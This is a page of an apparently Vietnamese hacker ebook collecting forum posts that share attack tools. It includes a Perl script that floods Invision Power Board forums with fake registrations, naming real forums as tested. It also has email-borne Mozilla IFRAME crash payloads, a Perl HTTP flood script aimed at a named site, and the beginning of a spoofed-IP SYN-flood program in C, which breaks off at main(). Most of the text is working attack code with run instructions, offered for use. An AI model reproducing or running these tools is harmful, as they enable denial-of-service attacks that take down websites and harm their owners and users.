Hacker Professional Ebook part 298 potx

tested links: http://forum.pravda.ru/ http://forum.bakililar.az/ Code: cmd: perl file.pl Host: www.sth.com Path: / RekcorVNISS Kho tool DDOS http://archiv.egocrew.de/packet/DoS/ nhocco

#!/usr/bin/perl

use IO::Socket;

##########################################################

## _ _ #

## | | | \ #

## | | | _/ #

## #

##IPB Register Multiple Users Denial of Service #

##Doesn't Work on forums using "Code Confirmation" #

##Created By SkOd #

##SED security Team #

##http://www.sed-team.be #

##skod.uk@gmail.com #

##ISRAEL #

########################################################## print q{ ############################################################ # Invision Power Board Multiple Users DOS #

# Tested on IPB 2.0.1 #

# created By SkOd SED Security Team #

############################################################

};

$rand=rand(10);

print "Forum Host: ";

$serv = <stdin>;

chop ($serv);

print "Forum Path: ";

$path = <stdin>;

chop ($path);

for ($i=0; $i<9999; $i++)

{

$name="sedXPL_".$rand.$i;

$data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord

=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com

&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_memb er_mail=1&day=11&month=11&year=1985&agree=1";

$len = length $data;

$get1 =

IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Conn

ect Host, it's can be beacuse the host dosed";

print $get1 "POST ".$path."index.php HTTP/1.0\n";

print $get1 "Host: ".$serv."\n";

print $get1 "Content-Type: application/x-www-form-urlencoded\n";

print $get1 "Content-Length: ".$len."\n\n";

print $get1 $data;

syswrite STDOUT, "+";

}

print "Forum shuld be Dosed Check it out \n";

^^ có thể thay $name để tạo dấu ấn riêng

tested links:

http://forum.pravda.ru/

http://forum.bakililar.az/

Code:

cmd: perl file.pl

Host: www.sth.com

Path: /

Rekcor(VNISS)

Kho tool DDOS

http://archiv.egocrew.de/packet/DoS/

nhoccon1412(vniss)

Multiple Mozilla Products IFRAME JavaScript Execution Vulnerability

Exploit = cách gửi Email có nội dung:

Code:

<html>

<body>

<iframe src="javascript:alert('Found by www.sysdream.com !')"></iframe>

</body>

</html>

* Denial of service (application crash) :

<html>

<body>

<iframe src="javascript:parent.document.write('Found by www.sysdream.com

!')"></iframe>

</body>

</html>

Nếu victim sữ dụng trình duyệt có dính bug thì sẽ bị crash

Nguồn: http://www.securityfocus.com/bid/16770/

HAIYEN02(vniss)

Perl DDoS

Code:

#!/usr/bin/perl

use IO::Socket;

my $host = "giotnuoc.com"; //site muon tan cong

my $path = "/khocnhe/"; //duong dan

my $data = "I_was_here"; // ghi cai gi cung duoc

for ($i=1;$i<9999;$i++){

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort

=> "80") || die "Khong the ket noi toi host";

print $sock "POST ".$path."index.php?".$data." HTTP/1.1\r\n";

print $sock "Content-Length: 97321\n\n";

print $sock "Host: ".$host."\r\n";

print $sock "Referer: http://dimemaybecu.com/concu.swf\r\n";

print "Attacking \n";

}

Save lai att.pl

vô DOS gõ : att.pl là nó tự động tấn công Nhớ cài perl trước khi xài nghen

Code rất đơn giản, cái này là do mình code thử , mấy anh xem rùi cho ý kiến

Thelast (vniss)

Share code :synflood.c(windown) và Soft

Code:

#include <winsock2.h>

#include <Ws2tcpip.h>

#include <windows.h>

#include <stdio.h>

#pragma comment(lib,"ws2_32")

#pragma comment(lib,"wsock32")

#define FAKE_IP "201.79.131.18"

#define SEQ 0x28376839

#define right "===============Coder Paris-ye====================\n" USHORT checksum(USHORT *buffer, int size);

int flood();

typedef struct tcphdr

{

USHORT th_sport;

USHORT th_dport;

unsigned int th_seq;

unsigned int th_ack;

unsigned char th_lenres;

unsigned char th_flag;

USHORT th_win;

USHORT th_sum;

USHORT th_urp;

}TCP_HEADER;

typedef struct iphdr

{

unsigned char h_verlen;

unsigned char tos;

unsigned short total_len;

unsigned short ident;

unsigned short frag_and_flags;

unsigned char ttl;

unsigned char proto;

unsigned short checksum;

unsigned int sourceIP;

unsigned int destIP;

}IP_HEADER;

struct

{

unsigned long saddr;

unsigned long daddr;

char mbz;

char ptcl;

unsigned short tcpl;

}PSD_HEADER;

WSADATA wsaData;

SOCKET sockMain = (SOCKET) NULL;

int

ErrorCode=0,flag=true,TimeOut=2000,FakeIpNet,FakeIpHost,dataSize=0,SendSE Q=0;

unsigned short activPort=40000;

struct sockaddr_in sockAddr;

TCP_HEADER tcpheader;

IP_HEADER ipheader;

char sendBuf[128];

USHORT checksum(USHORT *buffer, int size)

{

unsigned long cksum=0;

while(size >1) {

cksum+=*buffer++;

size-=sizeof(USHORT);

}

if(size) cksum+=*(UCHAR*)buffer;

cksum=(cksum >> 16)+(cksum&0xffff);

cksum+=(cksum >>16);

return (USHORT)(~cksum);

}

int main(int argc,char* argv[])